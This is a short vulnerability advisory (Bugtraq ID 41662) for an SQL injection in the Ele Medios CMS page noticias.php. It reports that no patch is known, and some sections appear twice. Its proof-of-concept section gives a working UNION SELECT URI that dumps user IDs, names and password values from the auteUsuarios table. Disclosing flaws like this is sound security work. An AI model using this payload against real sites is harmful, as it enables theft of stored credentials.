Ele Medios CMS 'noticias.php' SQL Injection Vulnerability
BID:41662
Info
Ele Medios CMS 'noticias.php' SQL Injection Vulnerability
| Bugtraq ID: | 41662 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 13 2009 12:00AM |
| Updated: | Dec 13 2009 12:00AM |
| Credit: | Dr.0rYX and Cr3w-DZ |
| Vulnerable: |
Ele Medios Ele Medios CMS 0 |
| Not Vulnerable: | |
Exploit / POC
Ele Medios CMS 'noticias.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/noticias.php?notiId=-1+union+select+1,GROUP_Concat(id,0x3a,nombre,0x3a,clave),3,4,5,6,7+from+auteUsuarios
Solution / Fix
Ele Medios CMS 'noticias.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].